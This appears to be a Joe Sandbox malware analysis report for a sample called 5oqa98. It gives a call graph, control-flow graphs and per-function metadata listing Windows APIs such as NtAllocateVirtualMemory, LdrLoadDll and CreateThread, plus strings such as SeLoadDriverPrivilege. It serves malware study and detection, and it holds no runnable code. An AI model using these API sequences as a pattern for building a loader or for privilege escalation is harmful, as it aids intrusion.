14000ca57 WideCharToMultiByte 14413->14420 14424 14000cab0 WriteFile 14413->14424 14414->14415 14429 14000c581 sprintf_s 14414->14429 14415->14401 14416 14000c8c5 WriteFile 14416->14417 14418 14000c928 GetLastError 14416->14418 14417->14415 14417->14416 14418->14415 14419 14000c991 WriteFile 14419->14422 14423 14000c9f4 GetLastError 14419->14423 14420->14413 14421 14000cb15 GetLastError 14420->14421 14421->14415 14422->14415 14422->14419 14423->14415 14424->14413 14425 14000caf6 GetLastError 14424->14425 14425->14413 14425->14415 14426 14000fd50 7 API calls sprintf_s 14426->14429 14427 14000c649 WideCharToMultiByte 14427->14415 14428 14000c68c WriteFile 14427->14428 14428->14429 14430 14000c80d GetLastError 14428->14430 14429->14415 14429->14426 14429->14427 14431 14000c829 GetLastError 14429->14431 14432 14000c6e2 WriteFile 14429->14432 14434 14000c81b GetLastError 14429->14434 14430->14415 14431->14415 14432->14429 14433 14000c7ff GetLastError 14432->14433 14433->14415 14434->14415 14437 14000b41e 14436->14437 14438 14000b42f EnterCriticalSection 14436->14438 14442 14000b2f0 14437->14442 14440 14000b423 14440->14438 14441 1400084e0 _lock 12 API calls 14440->14441 14441->14438 14443 14000b317 14442->14443 14444 14000b32e 14442->14444 14445 140009540 _lock 12 API calls 14443->14445 14446 140008300 _lock 17 API calls 14444->14446 14450 14000b342 _lock 14444->14450 14447 14000b31c 14445->14447 14448 14000b350 14446->14448 14449 140009300 _lock 10 API calls 14447->14449 14448->14450 14452 14000b400 _lock 22 API calls 14448->14452 14451 14000b324 14449->14451 14450->14440 14453 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14451->14453 14454 14000b371 14452->14454 14453->14444 14455 14000b3a7 14454->14455 14456 14000b379 14454->14456 14457 140008de0 _lock HeapFree GetLastError 14455->14457 14458 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14456->14458 14462 14000b392 _lock 14457->14462 14459 14000b386 14458->14459 14461 140008de0 _lock HeapFree GetLastError 14459->14461 14459->14462 14460 14000b3b0 LeaveCriticalSection 14460->14450 14461->14462 14462->14460 14464 14000c20c sprintf_s 14463->14464 14465 14000c212 _lock 14464->14465 14466 14000c22c SetFilePointer 14464->14466 14465->14406 14467 14000c254 sprintf_s 14466->14467 14468 14000c24a GetLastError 14466->14468 14467->14406 14468->14467 14035 140006c95 14037 140006d7b 14035->14037 14038 140006d9d 14035->14038 14036 140006f95 NtAllocateVirtualMemory 14036->14038 14037->14036 14037->14038 17965 7ff8ff5d11b0 17972 7ff8ff5d1209 17965->17972 17966 7ff8ff5d1b90 51 API calls 17983 7ff8ff5d1300 _invalid_parameter_noinfo_noreturn 17966->17983 17967 7ff8ff5d14f0 17993 7ff8ff5d1a40 17967->17993 17968 7ff8ff5d1b70 _invalid_parameter_noinfo_noreturn 8 API calls 17971 7ff8ff5d14d3 17968->17971 17969 7ff8ff5d12c7 17975 7ff8ff5d1b90 51 API calls 17969->17975 17970 7ff8ff5d129e 17974 7ff8ff5d14f6 17970->17974 17984 7ff8ff5d1b90 17970->17984 17972->17967 17972->17969 17972->17970 17978 7ff8ff5d12b9 BuildCatchObjectHelperInternal 17972->17978 17972->17983 17996 7ff8ff5d1110 17974->17996 17975->17978 17978->17966 17981 7ff8ff5d14eb 17982 7ff8ff5d79cc _invalid_parameter_noinfo_noreturn 47 API calls 17981->17982 17982->17967 17983->17968 17986 7ff8ff5d1b9b 17984->17986 17985 7ff8ff5d12b0 17985->17978 17985->17981 17986->17985 17987 7ff8ff5d7a4c BuildCatchObjectHelperInternal 2 API calls 17986->17987 17988 7ff8ff5d1bba 17986->17988 17987->17986 17991 7ff8ff5d1bc5 17988->17991 18002 7ff8ff5d21f0 17988->18002 17990 7ff8ff5d1110 Concurrency::cancel_current_task 51 API calls 17992 7ff8ff5d1bcb 17990->17992 17991->17990 18006 7ff8ff5d1b34 17993->18006 17997 7ff8ff5d111e Concurrency::cancel_current_task 17996->17997 17998 7ff8ff5d3990 Concurrency::cancel_current_task 2 API calls 17997->17998 17999 7ff8ff5d112f 17998->17999 18000 7ff8ff5d379c __std_exception_copy 49 API calls 17999->18000 18001 7ff8ff5d1159 18000->18001 18003 7ff8ff5d21fe Concurrency::cancel_current_task 18002->18003 18004 7ff8ff5d3990 Concurrency::cancel_current_task 2 API calls 18003->18004 18005 7ff8ff5d220f 18004->18005 18011 7ff8ff5d1ab0 18006->18011 18009 7ff8ff5d3990 Concurrency::cancel_current_task 2 API calls 18010 7ff8ff5d1b56 18009->18010 18012 7ff8ff5d379c __std_exception_copy 49 API calls 18011->18012 18013 7ff8ff5d1ae4 18012->18013 18013->18009 14470 1400054e0 14471 140005506 _lock 14470->14471 14472 14000552c 14470->14472 14483 1400074d0 14472->14483 14475 140008370 3 API calls 14478 140005545 __SehTransFilter 14475->14478 14476 1400055b8 14477 140008de0 _lock 2 API calls 14476->14477 14479 1400055c0 sprintf_s 14477->14479 14478->14476 14487 1400074f0 14478->14487 14479->14471 14482 1400055b0 GetLastError 14482->14476 14485 140007333 14483->14485 14484 1400073e0 LdrLoadDll 14484->14485 14485->14484 14486 140005536 14485->14486 14486->14475 14489 140007333 14487->14489 14488 140005561 CreateThread 14488->14479 14488->14482 14489->14488 14490 1400073e0 LdrLoadDll 14489->14490 14490->14489

                                                      Executed Functions

                                                      Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 153 140006f89-140006f8e 151->153 154 140006eef-140006f23 151->154 157 140006f95-140006fd6 NtAllocateVirtualMemory 153->157 158 140006f90 153->158 155 140006f25-140006f2d 154->155 156 140006f2f-140006f33 154->156 160 140006f37-140006f7a 155->160 156->160 157->132 159 140006fdc-140007020 157->159 158->132 161 14000702c-140007037 159->161 162 140006f84 160->162 163 140006f7c-140006f80 160->163 164 140007039-140007058 161->164 165 14000705a-140007062 161->165 162->151 163->162 164->161 168 14000706e-14000707b 165->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 173 140007096-1400070a9 169->173 174 1400070ab 169->174 171 1400072e2-1400072eb 170->171 172 140007164-14000717a 170->172 172->171 173->174 175 1400070ad-1400070db 173->175 176 140007064-14000706a 174->176 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@
                                                      • API String ID: 0-149943524
                                                      • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                      • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                      • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                      • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00
                                                      Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 272 140007341-1400073de 264->272 273 14000756c-1400075a2 264->273 268 1400074b4 265->268 269 140007480-1400074b3 265->269 270 1400074eb-14000752b 266->270 271 14000752c-140007535 266->271 268->271 269->268 270->271 274 140007552 271->274 275 140007537-140007554 271->275 272->256 273->260 274->260 275->264
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                      • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                      • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                      • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00
                                                      Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: File$CreateReadmalloc
                                                      • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                      • API String ID: 3950102678-3381721293
                                                      • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                      • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                      • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                      • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22
                                                      Function 00007FF8FF5D1C00 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 25 7ff8ff5d1c00-7ff8ff5d1c06 26 7ff8ff5d1c41-7ff8ff5d1c4b 25->26 27 7ff8ff5d1c08-7ff8ff5d1c0b 25->27 28 7ff8ff5d1d68-7ff8ff5d1d7d 26->28 29 7ff8ff5d1c35-7ff8ff5d1c74 call 7ff8ff5d2470 27->29 30 7ff8ff5d1c0d-7ff8ff5d1c10 27->30 34 7ff8ff5d1d8c-7ff8ff5d1da6 call 7ff8ff5d2304 28->34 35 7ff8ff5d1d7f 28->35 48 7ff8ff5d1d42 29->48 49 7ff8ff5d1c7a-7ff8ff5d1c8f call 7ff8ff5d2304 29->49 32 7ff8ff5d1c12-7ff8ff5d1c15 30->32 33 7ff8ff5d1c28 __scrt_dllmain_crt_thread_attach 30->33 39 7ff8ff5d1c17-7ff8ff5d1c20 32->39 40 7ff8ff5d1c21-7ff8ff5d1c26 call 7ff8ff5d23b4 32->40 37 7ff8ff5d1c2d-7ff8ff5d1c34 33->37 46 7ff8ff5d1da8-7ff8ff5d1dd9 call 7ff8ff5d242c call 7ff8ff5d22d4 call 7ff8ff5d27b4 call 7ff8ff5d25d0 call 7ff8ff5d25f4 call 7ff8ff5d245c 34->46 47 7ff8ff5d1ddb-7ff8ff5d1e0c call 7ff8ff5d2630 34->47 41 7ff8ff5d1d81-7ff8ff5d1d8b 35->41 40->37 46->41 57 7ff8ff5d1e1d-7ff8ff5d1e23 47->57 58 7ff8ff5d1e0e-7ff8ff5d1e14 47->58 52 7ff8ff5d1d44-7ff8ff5d1d59 48->52 60 7ff8ff5d1c95-7ff8ff5d1ca6 call 7ff8ff5d2374 49->60 61 7ff8ff5d1d5a-7ff8ff5d1d67 call 7ff8ff5d2630 49->61 63 7ff8ff5d1e65-7ff8ff5d1e6d call 7ff8ff5d1720 57->63 64 7ff8ff5d1e25-7ff8ff5d1e2f 57->64 58->57 62 7ff8ff5d1e16-7ff8ff5d1e18 58->62 78 7ff8ff5d1cf7-7ff8ff5d1d01 call 7ff8ff5d25d0 60->78 79 7ff8ff5d1ca8-7ff8ff5d1ccc call 7ff8ff5d2778 call 7ff8ff5d22c4 call 7ff8ff5d22e8 call 7ff8ff5d7b10 60->79 61->28 69 7ff8ff5d1f02-7ff8ff5d1f0f 62->69 75 7ff8ff5d1e72-7ff8ff5d1e7b 63->75 70 7ff8ff5d1e36-7ff8ff5d1e3c 64->70 71 7ff8ff5d1e31-7ff8ff5d1e34 64->71 76 7ff8ff5d1e3e-7ff8ff5d1e44 70->76 71->76 81 7ff8ff5d1eb3-7ff8ff5d1eb5 75->81 82 7ff8ff5d1e7d-7ff8ff5d1e7f 75->82 85 7ff8ff5d1ef8-7ff8ff5d1f00 76->85 86 7ff8ff5d1e4a-7ff8ff5d1e5f call 7ff8ff5d1c00 76->86 78->48 101 7ff8ff5d1d03-7ff8ff5d1d0f call 7ff8ff5d2620 78->101 79->78 127 7ff8ff5d1cce-7ff8ff5d1cd5 __scrt_dllmain_after_initialize_c 79->127 91 7ff8ff5d1eb7-7ff8ff5d1eba 81->91 92 7ff8ff5d1ebc-7ff8ff5d1ed1 call 7ff8ff5d1c00 81->92 82->81 89 7ff8ff5d1e81-7ff8ff5d1ea3 call 7ff8ff5d1720 call 7ff8ff5d1d68 82->89 85->69 86->63 86->85 89->81 122 7ff8ff5d1ea5-7ff8ff5d1eaa 89->122 91->85 91->92 92->85 111 7ff8ff5d1ed3-7ff8ff5d1edd 92->111 114 7ff8ff5d1d35-7ff8ff5d1d40 101->114 115 7ff8ff5d1d11-7ff8ff5d1d1b call 7ff8ff5d2538 101->115 112 7ff8ff5d1ee4-7ff8ff5d1ef2 111->112 113 7ff8ff5d1edf-7ff8ff5d1ee2 111->113 119 7ff8ff5d1ef4 112->119 113->119 114->52 115->114 126 7ff8ff5d1d1d-7ff8ff5d1d2b 115->126 119->85 122->81 126->114 127->78 128 7ff8ff5d1cd7-7ff8ff5d1cf4 call 7ff8ff5d7acc 127->128 128->78
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                      • String ID:
                                                      • API String ID: 190073905-0
                                                      • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                      • Instruction ID: 025312add830061ad33f2e51a38d6e978142aeb35684ac3ebb93706ff0d06924
                                                      • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                      • Instruction Fuzzy Hash: 36816921E0E2434FFB54AB659C422BD2690AF6D7C0F548335EA7C477E6DEACE8458B10
                                                      Function 00007FF8FF5D1720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                      • String ID: WordpadFilter.db
                                                      • API String ID: 868324331-3647581008
                                                      • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                      • Instruction ID: 065d25fe0c8e138fbeba3560210c054f0e804bed63e6c74ac8c69c818f614a15
                                                      • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                      • Instruction Fuzzy Hash: A2315C32B1AB418EF700CFA1D8402AD73A5EB9D788F154635EEAD13B89EE78D591C740
                                                      Function 00007FF8FF5D11B0 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 196 7ff8ff5d11b0-7ff8ff5d1207 197 7ff8ff5d1209-7ff8ff5d1222 call 7ff8ff5e1490 196->197 198 7ff8ff5d124b-7ff8ff5d124e 196->198 210 7ff8ff5d1224-7ff8ff5d1227 197->210 211 7ff8ff5d123e 197->211 199 7ff8ff5d1254-7ff8ff5d1280 198->199 200 7ff8ff5d14b8-7ff8ff5d14bf 198->200 202 7ff8ff5d12f6-7ff8ff5d1335 call 7ff8ff5d1b90 call 7ff8ff5e0a50 199->202 203 7ff8ff5d1282-7ff8ff5d128f 199->203 204 7ff8ff5d14c3-7ff8ff5d14ea call 7ff8ff5d1b70 200->204 231 7ff8ff5d1340-7ff8ff5d13cb 202->231 207 7ff8ff5d1295-7ff8ff5d129c 203->207 208 7ff8ff5d14f1-7ff8ff5d14f6 call 7ff8ff5d1a40 203->208 214 7ff8ff5d12c7-7ff8ff5d12cf call 7ff8ff5d1b90 207->214 215 7ff8ff5d129e-7ff8ff5d12a5 207->215 220 7ff8ff5d14f7-7ff8ff5d14ff call 7ff8ff5d1110 208->220 212 7ff8ff5d1241-7ff8ff5d1246 210->212 217 7ff8ff5d1229-7ff8ff5d123c call 7ff8ff5e1490 210->217 211->212 212->198 233 7ff8ff5d12d2-7ff8ff5d12f1 call 7ff8ff5e0e10 214->233 215->220 221 7ff8ff5d12ab-7ff8ff5d12b3 call 7ff8ff5d1b90 215->221 217->210 217->211 235 7ff8ff5d12b9-7ff8ff5d12c5 221->235 236 7ff8ff5d14eb-7ff8ff5d14f0 call 7ff8ff5d79cc 221->236 231->231 234 7ff8ff5d13d1-7ff8ff5d13da 231->234 233->202 238 7ff8ff5d13e0-7ff8ff5d1402 234->238 235->233 236->208 241 7ff8ff5d1404-7ff8ff5d140e 238->241 242 7ff8ff5d1411-7ff8ff5d142c 238->242 241->242 242->238 244 7ff8ff5d142e-7ff8ff5d1436 242->244 245 7ff8ff5d1498-7ff8ff5d14a6 244->245 246 7ff8ff5d1438-7ff8ff5d143b 244->246 247 7ff8ff5d14b6 245->247 248 7ff8ff5d14a8-7ff8ff5d14b5 call 7ff8ff5d1bcc 245->248 249 7ff8ff5d1440-7ff8ff5d1449 246->249 247->204 248->247 251 7ff8ff5d1455-7ff8ff5d1465 249->251 252 7ff8ff5d144b-7ff8ff5d1453 249->252 254 7ff8ff5d1467-7ff8ff5d146e 251->254 255 7ff8ff5d1470-7ff8ff5d1496 251->255 252->251 254->255 255->245 255->249
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                      • String ID:
                                                      • API String ID: 73155330-0
                                                      • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                      • Instruction ID: 41b28644598ac2c479b277e728c18b0403575c7854245981906d28029574b22f
                                                      • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                      • Instruction Fuzzy Hash: 83810C22A1EB974AFB118B359C40179A694EF6ABD4F148335EEB9577D2DF3CE0918300

                                                      Non-executed Functions

                                                      Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                      • String ID:
                                                      • API String ID: 3526400053-0
                                                      • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                      • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                      • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                      • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                      Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                      • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                      • API String ID: 3408796845-4213300970
                                                      • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                      • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                      • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                      • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                      Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                      • String ID: ampStopSingletone: logging ended
                                                      • API String ID: 2048888615-3533855269
                                                      • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                      • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                      • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                      • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                      Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                      • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                      • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
